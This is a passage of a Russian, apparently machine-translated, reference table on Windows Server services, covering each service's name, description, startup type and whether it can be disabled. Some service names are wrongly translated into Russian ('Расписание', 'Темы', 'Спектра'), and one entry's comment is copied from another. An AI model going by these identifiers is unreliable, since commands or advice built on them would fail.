Описание	Служба RPCSS — это диспетчер управления службами для серверов COM и DCOM. Она выполняет запросы активации объектов, разрешение экспортера объектов и распределенный сбор мусора для этих серверов. Если эта служба остановлена ​​или отключена, программы, использующие COM или DCOM, не будут работать должным образом. Отключать службу RPCSS не рекомендуется.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Не отключать
Комментарии	Нет

Локатор удаленного вызова процедур (RPC)

Имя	Описание
Имя службы	RpcLocator
Описание	В Windows 2003 и более ранних версиях Windows служба локатора удаленного вызова процедур (RPC) управляет базой данных службы имен RPC. В Windows Vista и более поздних версиях Windows эта служба не предоставляет никаких функций и присутствует для совместимости приложений.
Установка	Только с возможностями рабочего стола
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Удаленный реестр

Имя	Описание
Имя службы	RemoteRegistry
Описание	Позволяет удаленным пользователям изменять параметры реестра на этом компьютере. Если эта служба остановлена, реестр могут изменять только пользователи на этом компьютере. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Не отключать
Комментарии	Нет

Демонстрационная служба для розничной торговли

Имя	Описание
Имя службы	RetailDemo
Описание	Служба демонстрации розничной торговли управляет активностью устройства, пока устройство находится в демонстрационном режиме розничной торговли.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Можно отключить
Комментарии	Нет

Маршрутизация и удаленный доступ

Имя	Описание
Имя службы	RemoteAccess
Описание	Предоставляет службы маршрутизации для предприятий в локальной и глобальной сети.
Установка	Всегда устанавливается
Тип запуска	Отключен
Рекомендации	Уже отключена
Комментарии	Уже отключена

Сопоставитель конечных точек RPC

Имя	Описание
Имя службы	RpcEptMapper
Описание	Разрешает идентификаторы интерфейсов RPC для транспортировки конечных точек. Если эта служба остановлена ​​или отключена, программы, использующие службы удаленного вызова процедур (RPC), не будут работать должным образом.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Не отключать
Комментарии	Нет

Вторичный вход в систему

Имя	Описание
Имя службы	seclogon
Описание	Позволяет запускать процессы от имени другого пользователя. Если остановить эту службу, этот тип входа в систему будет недоступен. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Служба SSTP

Имя	Описание
Имя службы	SstpSvc
Описание	Обеспечивает поддержку протокола SSTP для подключения к удаленным компьютерам с использованием VPN. При отключении данной службы пользователи не смогут использовать SSTP для доступа к удаленным серверам.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	ОК, чтобы отключить
Комментарии	Отключение прерывает работу RRAS

Диспетчер учетных записей безопасности

Имя	Описание
Имя службы	SamSs
Описание	Запуск этой службы сообщает другим службам, что диспетчер учетных записей безопасности (SAM) готов к приему запросов. При отключении данной службы другие службы в системе не получат уведомления о готовности SAM, что, в свою очередь, может помешать корректному запуску этих служб. Не следует отключать эту службу.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Не отключать
Комментарии	Нет

Центр безопасности

Имя	Описание
Имя службы	wscsvc
Описание	Служба WSCSVC (центр Безопасность Windows) отслеживает и сообщает о параметрах работоспособности системы безопасности на компьютере. К параметрам работоспособности относятся брандмауэр (вкл./выкл.), антивирусная программа (вкл./выкл./устаревшая), антишпионское ПО (вкл./выкл.), клиентский компонент Центра обновления Windows (автоматическое/ручное скачивание и установка обновлений), контроль учетных записей (вкл./выкл.) и параметры Интернета (рекомендуется/не рекомендуется). Служба предоставляет COM-API для независимых поставщиков программного обеспечения для регистрации и записи состояния своих продуктов в службу Центра безопасности. Пользовательский интерфейс безопасности и обслуживания использует службу для предоставления оповещений системного набора данных и графического представления состояний работоспособности безопасности на панели управления Безопасность и обслуживание. Защита доступа к сети (NAP) использует службу для передачи сведений о состоянии работоспособности безопасности клиентов серверу политики сети NAP для принятия решений о карантине сети. Служба также имеет общедоступный API, который позволяет внешним потребителям программно получать агрегированное состояние работоспособности системы.
Установка	Только с возможностями рабочего стола
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Служба данных датчиков

Имя	Описание
Имя службы	SensorDataService
Описание	Предоставляет данные от различных датчиков
Установка	Только с возможностями рабочего стола
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Служба наблюдения за датчиками

Имя	Описание
Имя службы	SensrSvc
Описание	Ведет наблюдение за различными датчиками для предоставления доступа к данным и адаптации к системному и пользовательскому состоянию. В случае остановки или отключения этой службы корректировка яркости дисплея в соответствии с освещенностью не производится. Остановка этой службы также может повлиять на другие функции и компоненты системы.
Установка	Только с возможностями рабочего стола
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Служба датчиков

Имя	Описание
Имя службы	SensorService
Описание	Служба, которая управляет функциями разных датчиков. Управляет простой ориентацией устройства (SDO) и журналом датчиков. Загружает простой датчик ориентации устройства, который передает сведения об изменениях в ориентации устройства. Если эта служба остановлена или отключена, простой датчик ориентации устройства не будет загружаться и автоповорот не будет работать. Наполнение журнала с датчиков также будет прекращено.
Установка	Только с возможностями рабочего стола
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Сервер

Имя	Описание
Имя службы	LanmanServer
Описание	Поддерживает совместное использование файлов, печати и именованных каналов по сети для этого компьютера. Если эта служба остановлена, эти функции будут недоступны. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	ОК, чтобы отключить
Комментарии	Необходима для удаленного управления, IPC$, совместного использования файлового ресурса SMB

Диспетчер учетных записей общего компьютера

Имя	Описание
Имя службы	shpamsvc
Описание	Управляет профилями и учетными записями на устройстве, настроенном в SharedPC.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	ОК, чтобы отключить
Комментарии	Необходима для удаленного управления, IPC$, совместного использования файлового ресурса SMB

Определение оборудования оболочки

Имя	Описание
Имя службы	ShellHWDetection
Описание	Предоставляет уведомления об аппаратных событиях автозапуска.
Установка	Только с возможностями рабочего стола
Тип запуска	Автоматически
Рекомендации	Можно отключить
Комментарии	Нет

Смарт-карта

Имя	Описание
Имя службы	SCardSvr
Описание	Управляет доступом к смарт-картам, считываемым этим компьютером. Если эта служба остановлена, этот компьютер не сможет считывать смарт-карты. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Служба перечисления устройств чтения смарт-карт

Имя	Описание
Имя службы	ScDeviceEnum
Описание	Создает узлы программного устройства для всех устройств чтения смарт-карт, доступных для этого сеанса. Если эта служба отключена, API WinRT не смогут перечислять устройства чтения смарт-карт.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Требуется почти исключительно для приложений WinRT

Политика удаления смарт-карт

Имя	Описание
Имя службы	SCPolicySvc
Описание	Позволяет настроить систему для блокировки рабочего стола пользователя после удаления смарт-карты.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	ОК, чтобы отключить
Комментарии	Нет

Ловушка SNMP

Имя	Описание
Имя службы	SNMPTRAP
Описание	Принимает сообщения перехвата, созданные локальными или удаленными агентами SNMP и пересылает их программам управления SNMP, запущенным на этом компьютере. Если эта служба остановлена, программы на основе SNMP на этом компьютере перестанут получать сообщения перехвата. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Защита программного обеспечения

Имя	Описание
Имя службы	sppsvc
Описание	Позволяет скачивать, устанавливать и применять цифровые лицензии для Windows и приложений Windows. Если служба отключена, операционная система и лицензионные приложения могут работать в режиме уведомлений. Настоятельно рекомендуется не отключать службу защиты программного обеспечения.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Не отключать
Комментарии	Нет

Служба пространственных данных

Имя	Описание
Имя службы	SharedRealitySvc
Описание	Эта служба используется для сценариев пространственного восприятия.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Быстрая проверка

Имя	Описание
Имя службы	svsvc
Описание	Проверяет потенциальные повреждения файловой системы.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Обнаружение SSDP

Имя	Описание
Имя службы	SSDPSRV
Описание	Обнаруживает сетевые устройства и службы, использующие протокол обнаружения SSDP, такие как устройства UPnP. Кроме того, объявляет устройства и службы SSDP, работающие на локальном компьютере. Если эта служба остановлена, обнаружение устройств, использующих SSDP, не будет выполняться. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка	Только с возможностями рабочего стола
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Служба репозитория состояний

Имя	Описание
Имя службы	StateRepository
Описание	Обеспечивает необходимую поддержку инфраструктуры для модели приложения.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

События получения неподвижных изображений

Имя	Описание
Имя службы	WiaRpc
Описание	Запускает приложения, связанные с событиями получения неподвижных изображений.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Служба хранилища

Имя	Описание
Имя службы	StorSvc
Описание	Активирует службу по настройке хранилища и расширению внешнего хранилища.
Установка	Всегда устанавливается
Тип запуска	Автоматически (отложенный запуск)
Рекомендации	Нет рекомендаций
Комментарии	Нет

Управление уровнями хранилища

Имя	Описание
Имя службы	TieringEngineService
Описание	Оптимизирует размещение данных на уровнях хранилища во всех многоуровневых пространствах хранения в системе.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Нет рекомендаций
Комментарии	Нет

Узел синхронизации

Имя	Описание
Имя службы	OneSyncSvc
Описание	Служба синхронизирует почту, контакты, календарь и различные другие пользовательские данные. Почта и другие приложения, зависящие от этого компонента, не будут работать должным образом, когда эта служба не запущена.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Можно отключить
Комментарии	Шаблон пользовательской службы

SysMain

Имя	Описание
Имя службы	SysMain
Описание	Поддерживает и улучшает производительность системы с течением времени.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Не отключать
Комментарии	Нет

Служба уведомления о системных событиях

Имя	Описание
Имя службы	SENS
Описание	Отслеживает системные события и уведомляет подписчиков системы событий COM+ об этих событиях.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Нет рекомендаций
Комментарии	Нет

Брокер системных событий

Имя	Описание
Имя службы	SystemEventsBroker
Описание	Координирует выполнение фоновой работы для приложения WinRT. Если эта служба остановлена ​​или отключена, фоновые задачи могут не запускаться.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Не отключать
Комментарии	Несмотря на то что ее описание подразумевает, что служба предназначена только для приложений WinRT, она необходима для планировщика задач, службы инфраструктуры брокера и других внутренних компонентов.

Брокер мониторинга среды выполнения System Guard

Имя	Описание
Имя службы	SgrmBroker
Описание	Отслеживает и подтверждает целостность платформы Windows.
Установка	Всегда устанавливается
Тип запуска	Автоматически (отложенный запуск)
Рекомендации	Не отключать
Комментарии	Нет

Планировщик заданий

Имя	Описание
Имя службы	Расписание
Описание	Позволяет настраивать и задавать расписание автоматического выполнения задач на этом компьютере. Эта служба также отвечает за выполнение нескольких критически важных системных задач Windows. Если эта служба остановлена или отключена, эти задачи не будут выполняться в запланированное время. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Не отключать
Комментарии	Нет

Вспомогательное приложение для NetBIOS TCP/IP

Имя	Описание
Имя службы	lmhosts
Описание	Осуществляет поддержку службы NetBIOS через TCP/IP (NetBT) и разрешение имен NetBIOS для клиентов в сети, позволяя пользователям получать общий доступ к файлам, принтерам, а также подключаться к сети. Если эта служба остановлена, эти функции могут быть недоступны. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Telephony (Телефония)

Имя	Описание
Имя службы	TapiSrv
Описание	Обеспечивает поддержку API телефонии (TAPI) для программ, которые управляют устройствами телефонии на локальном компьютере и через локальную сеть на серверах, на которых также работает служба.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Отключение прерывает работу RRAS

Темы

Имя	Описание
Имя службы	Темы
Описание	Обеспечивает управление темой пользовательского интерфейса.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Можно отключить
Комментарии	Невозможно установить специализированные темы, когда эта служба отключена

Брокер событий времени

Имя	Описание
Имя службы	TimeBrokerSvc
Описание	Координирует выполнение фоновой работы для приложения WinRT. Если эта служба остановлена ​​или отключена, фоновые задачи могут не запускаться.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Несмотря на то что ее описание подразумевает, что служба предназначена только для приложений WinRT, она необходима для планировщика задач, службы инфраструктуры брокера и других внутренних компонентов.

Служба сенсорной клавиатуры и панели рукописного ввода

Имя	Описание
Имя службы	TabletInputService
Описание	Обеспечивает функционирование пера и рукописного ввода для сенсорной клавиатуры и панели рукописного ввода.
Установка	Только с возможностями рабочего стола
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Service_30711 пользователя Udk

Имя	Описание
Имя службы	UdkUserSvc_307f1
Описание	Служба компонентов оболочки
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Служба оркестратора обновлений для Центра обновления Windows

Имя	Описание
Имя службы	UsoSvc
Описание	Управляет обновлениями Windows. В случае остановки службы ваши устройства не смогут скачивать и устанавливать последние обновления.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	клиентский компонент Центра обновления Windows (включая WSUS) зависит от этой службы.

Узел устройств UPnP

Имя	Описание
Имя службы	upnphost
Описание	Позволяет размещать устройства UPnP на этом компьютере. Если эта служба остановлена, все размещенные устройства UPnP перестанут работать и никакие дополнительные размещенные устройства невозможно будет добавить. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка	Только с возможностями рабочего стола
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Доступ к данным пользователя

Имя	Описание
Имя службы	UserDataSvc_307f1
Описание	Предоставляет приложениям доступ к структурированным данным пользователя, включая контактную информацию, календари, сообщения и другое содержимое. Если вы остановите или отключите эту службу, приложения, использующие эти данные, могут работать неправильно.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Хранилище данных пользователя

Имя	Описание
Имя службы	UnistoreSvc_307f1
Описание	Управляет хранением структурированных данных пользователя, включая контактную информацию, календари, сообщения и другое содержимое. Если вы остановите или отключите эту службу, приложения, использующие эти данные, могут работать неправильно.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Служба виртуализации взаимодействия с пользователем — двойные проверка

Имя	Описание
Имя службы	UevAgentService
Описание	Обеспечивает поддержку приложений и роуминга параметров ОС.
Установка	Всегда устанавливается
Тип запуска	Отключен
Рекомендации	Уже отключена
Комментарии	Нет

Диспетчер пользователей

Имя	Описание
Имя службы	UserManager
Описание	Диспетчер пользователей предоставляет компоненты среды выполнения, необходимые для взаимодействия с несколькими пользователями. Если эта служба остановлена, некоторые приложения могут не работать должным образом.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Не отключать
Комментарии	Нет

Служба профилей пользователей

Имя	Описание
Имя службы	ProfSvc
Описание	Эта служба отвечает за загрузку и выгрузку профилей пользователей. Если эта служба остановлена или отключена, пользователи не могут успешно входить в систему и выполнять выход, в приложениях могут возникать ошибки при обращении к данным пользователей, а компоненты, зарегистрированные для получения уведомлений о событиях профилей, не получат их.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Не отключать
Комментарии	Нет

Виртуальный диск

Имя	Описание
Имя службы	vds
Описание	Предоставляет службы управления дисками, томами, файловыми системами и массивами хранения данных.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Нет рекомендаций
Комментарии	Нет

Служба теневого копирования томов

Имя	Описание
Имя службы	VSS
Описание	Управляет созданием теневых копий томов, которые используются для резервного копирования и восстановления или для иных целей. Если эта служба остановлена, теневые копии томов для восстановления не будут доступны и резервное копирование может не работать. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Служба компонатора громкости звука

Имя	Описание
Имя службы	VacSvc
Описание	Выполняет пространственный анализ для Смешанная реальность имитации звука.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

WalletService

Имя	Описание
Имя службы	WalletService
Описание	Содержит объекты, используемые клиентами кошелька.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

WarpJITSvc

Имя	Описание
Имя службы	WarpJITSvc
Описание	Предоставляет JIT-службу вне процесса для WARP при работе с включенным протоколом ACG.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Диспетчер учетных веб-записей

Имя	Описание
Имя службы	TokenBroker
Описание	Эта служба используется диспетчером веб-учетных записей для обеспечения единого входа в приложения и службы.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Веб-клиент

Имя	Описание
Имя службы	WebClient
Описание	Позволяет программам windows создавать, получать доступ к файлам в Интернете и изменять их. Если эта служба остановлена, эти функции будут недоступны. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

диспетчер подключений Wi-Fi Direct Services

Имя	Описание
Имя службы	WFDSConmgrSvc
Описание	Управляет подключениями к беспроводным службам, включая беспроводной дисплей и стыковку.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Windows Audio

Имя	Описание
Имя службы	Audiosrv
Описание	Управляет аудио в программах на базе Windows. Если эта служба остановлена, звуковые устройства и эффекты не будут работать должным образом. Если эта служба отключена, любые службы, которые явно зависят от нее, не могут быть запущены.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Средство построения конечных точек Windows Audio

Имя	Описание
Имя службы	AudioEndpointBuilder
Описание	Управляет звуковыми устройствами для службы Windows Audio. Если эта служба остановлена, звуковые устройства и эффекты не будут работать должным образом. Если эта служба отключена, любые службы, которые явно зависят от нее, не могут быть запущены.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

программа архивации данных

Имя	Описание
Имя службы	SDRSVC
Описание	Предоставляет возможности программа архивации данных и восстановления.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Биометрическая служба Windows

Имя	Описание
Имя службы	WbioSrvc
Описание	Биометрическая служба Windows предназначена для сбора, сравнения, обработки и хранения биометрических данных в клиентских приложениях без получения непосредственного доступа к биометрическим образцам или оборудованию. Эта служба размещается в привилегированном процессе SVCHOST.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Сервер кадров Камеры Windows

Имя	Описание
Имя службы	FrameServer
Описание	Позволяет нескольким клиентам получать доступ к видеокадрам с камер.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Windows Connect Now — регистратор конфигураций

Имя	Описание
Имя службы	Wcncsvc
Описание	В WCNCSVC размещается конфигурация Windows Connect Now, которая является протоколом Microsoft Implementation of Wireless Protected Setup (WPS). Используется для настройки параметров беспроводной локальной сети для точки доступа (AP) или беспроводного устройства. Служба запускается программным способом при необходимости.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Можно отключить
Комментарии	Нет

Диспетчер подключений Windows

Имя	Описание
Имя службы	Wcmsvc
Описание	Принимает решения об автоматическом подключении или отключении, исходя из доступных для ПК параметров подключения к сети, и позволяет управлять подключениями к сети на основе параметров групповой политики.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Можно отключить
Комментарии	Нет

Служба Advanced Threat Protection в Защитнике Windows

Имя	Описание
Имя службы	WdNisSvc
Описание	Служба Advanced Threat Protection в Защитнике Windows помогает защититься от сложных угроз, отслеживая и сообщая о событиях безопасности, происходящих на компьютере.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Брандмауэр Защитника Windows

Имя	Описание
Имя службы	mpssvc
Описание	Брандмауэр Защитника Windows помогает защитить компьютер, предотвращая доступ неавторизованных пользователей к компьютеру через Интернет или сеть.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Служба узла поставщика шифрования Windows

Имя	Описание
Имя службы	WEPHOSTSVC
Описание	Служба узла поставщика шифрования Windows является брокером между функциями шифрования, предоставляемыми сторонними поставщиками, и процессами, которым требуется оценивать и применять политики EAS. При остановке этой службы станут недействительными проверки соответствия EAS, которые были установлены подключенными учетными записями почты.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Служба регистрации ошибок Windows

Имя	Описание
Имя службы	WerSvc
Описание	Разрешает отправку отчетов об ошибках в случае прекращения работы или реагирования программы на запросы, а также разрешает доставку имеющихся решений. Разрешает также создание журналов для служб диагностики и восстановления. Если эта служба остановлена, то могут не работать отчеты об ошибках и не отображаться результаты служб диагностики и восстановления.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Собирает и отправляет данные аварийного завершения или зависаний, используемые как Майкрософт, так и сторонними независимыми поставщиками программного обеспечения и независимыми поставщиками оборудования. Данные используются для диагностики ошибок, вызывающих сбои, которые могут содержать ошибки безопасности. Требуется также для корпоративных отчетов об ошибках.

Сборщик событий Windows

Имя	Описание
Имя службы	Wecsvc
Описание	Эта служба управляет постоянными подписками на события от удаленных источников, поддерживающих протокол WS-Management. Сюда входят журналы событий Windows Vista, оборудование, а также источники с интерфейсом IPMI. Эта служба хранит пересылаемые события в локальном журнале событий. Если эта служба остановлена или отключена, подписки на события не могут быть созданы и отправленные события не могут быть приняты.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Собирает события трассировки событий Windows (включая события безопасности) для управляемости и диагностики. Множество компонентов и средств сторонних разработчиков зависят от службы, в том числе средства аудита безопасности.

Журнал событий Windows

Имя	Описание
Имя службы	EventLog
Описание	Эта служба управляет событиями и журналами событий. Она поддерживает регистрацию и запрос событий, подписку на события, архивацию журналов и управление метаданными событий. События могут отображаться в формате XML и текстовом формате. Остановка этой службы может снизить безопасность и надежность системы.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Не отключать
Комментарии	Нет

Служба кэширования шрифтов Windows

Имя	Описание
Имя службы	FontCache
Описание	Оптимизирует производительность приложений, кэшируя наиболее часто используемые данные о шрифтах. Приложения будут запускать эту службу, если она еще не выполняется. Отключение службы может привести к снижению производительности приложения.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Не отключать
Комментарии	Нет

Служба загрузки изображений (WIA)

Имя	Описание
Имя службы	stisvc
Описание	Предоставляет службы получения изображений со сканеров и цифровых камер.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Служба предварительной оценки Windows

Имя	Описание
Имя службы	wisvc
Описание	wisvc
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Установщик Windows

Имя	Описание
Имя службы	msiserver
Описание	Добавляет, изменяет и удаляет приложения, предоставляемые в виде пакета установщика Windows ( *.msi, *.msp ). Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Служба диспетчера лицензирования Windows

Имя	Описание
Имя службы	LicenseManager
Описание	Обеспечивает поддержку инфраструктуры для Microsoft Store. Эта служба запускается по требованию, и, если она отключена, содержимое, полученное через Microsoft Store, не будет работать должным образом.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	ОК, чтобы отключить
Комментарии	Нет

Инструментарий управления Windows (WMI)

Имя	Описание
Имя службы	Winmgmt
Описание	Предоставляет общий интерфейс и объектную модель для доступа к информации об управлении операционной системой, устройствами, приложениями и службами. После остановки данной службы многие Windows-приложения могут работать некорректно. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Не отключать
Комментарии	Нет

Служба управления Windows

Имя	Описание
Имя службы	WManSvc
Описание	Выполняет управление, включая действия по подготовке и регистрации
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Служба общего доступа к проигрывателю Windows Media по сети

Имя	Описание
Имя службы	WMPNetworkSvc
Описание	Публикует библиотеки проигрывателя Windows Media на других сетевых проигрывателях и мультимедийных устройствах с помощью технологии Universal Plug and Play.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Служба Windows Mobile Hotspot.

Имя	Описание
Имя службы	icssvc
Описание	Предоставляет возможность обмениваться мобильными данными с другим устройством.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Установщик модулей Windows

Имя	Описание
Имя службы	TrustedInstaller
Описание	Позволяет устанавливать, изменять и удалять обновления Windows и дополнительные компоненты. Если эта служба отключена, установка или удаление обновлений Windows на этом компьютере может завершиться сбоем.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Служба распознавания Windows

Имя	Описание
Имя службы	Спектра
Описание	Обеспечивает пространственное восприятие, пространственный ввод и голографическую отрисовку.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	ОК, чтобы отключить
Комментарии	Нет

Служба имитации восприятия Windows

Имя	Описание
Имя службы	perceptionsimulation
Описание	Включает имитацию пространственного восприятия, управление виртуальной камерой и имитацию пространственного ввода.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	ОК, чтобы отключить
Комментарии	Нет

Служба системы push-уведомлений Windows

Имя	Описание
Имя службы	WpnService
Описание	Эта служба запускается в сеансе 0 и служит местом размещения платформы уведомлений и поставщика подключений, обрабатывающего соединение между устройством и сервером WNS.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Не отключать
Комментарии	Требуется для динамических плиток и других функций

Пользовательская служба push-уведомлений Windows

Имя	Описание
Имя службы	WpnUserService_307f1
Описание	Эта служба размещает платформу уведомлений Windows, которая обеспечивает поддержку локальных и push-уведомлений. Поддерживаются уведомления на плитке, всплывающие и необработанные уведомления.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Служба Windows PushToInstall

Имя	Описание
Имя службы	PushToInstall
Описание	Обеспечивает поддержку инфраструктуры для Microsoft Store. Эта служба запускается автоматически, и если она отключена, удаленные установки не будут работать должным образом.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	ОК, чтобы отключить
Комментарии	Нет

Удаленное управление Windows (WS-Management)

Имя	Описание
Имя службы	WinRM
Описание	Служба удаленного управления Windows (WinRM) реализует протокол WS-Management для удаленного управления. WS-Management — это стандартный протокол веб-служб, использующийся для удаленного управления программным обеспечением и оборудованием. Служба WinRM прослушивает сеть на предмет запросов WS-Management и обрабатывает их. Для прослушивания сети служба WinRM должна быть настроена с помощью прослушивателя, использующего средство командной строки winrm.cmd, или в групповой политике. Служба WinRM обеспечивает доступ к данным WMI и разрешает сбор событий. Для сбора событий и подписки на события необходимо, чтобы служба была запущена. Сообщения WinRM используют протоколы HTTP и HTTPS как транспорт. Служба WinRM не зависит от IIS, но предварительно настроена для общего доступа к порту с помощью IIS на том же компьютере. Служба WinRM резервирует префикс URL-адреса /wsman. Чтобы предотвратить конфликты с IIS, администраторы должны убедиться, что веб-сайты, размещенные в IIS, не используют префикс URL-адреса /wsman.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Не отключать
Комментарии	Требуется для удаленного управления

Поиск Windows

Имя	Описание
Имя службы	WSearch
Описание	Обеспечивает индексацию содержимого, кэширование свойств и результаты поиска файлов, электронной почты и другого содержимого.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	ОК, чтобы отключить
Комментарии	Нет

Служба Безопасность Windows

Имя	Описание
Имя службы	SecurityHealthService
Описание	Служба Безопасность Windows обрабатывает унифицированные сведения о защите устройств и работоспособности
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Не отключать
Комментарии	Нет

Служба времени Windows

Имя	Описание
Имя службы	W32Time
Описание	Управляет синхронизацией даты и времени на всех клиентах и серверах в сети. Если эта служба остановлена, синхронизация даты и времени не будет доступна. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Не отключать
Комментарии	Нет

Центр обновления Windows

Имя	Описание
Имя службы	wuauserv
Описание	Включает обнаружение, скачивание и установку обновлений для Windows и других программ. Если эта служба отключена, то на этом компьютере нельзя будет использовать клиентский компонент Центра обновления Windows либо возможности автоматического обновления и программы не смогут использовать API Агента обновления Windows (WUA).
Установка	Всегда устанавливается
Тип запуска	Вручную
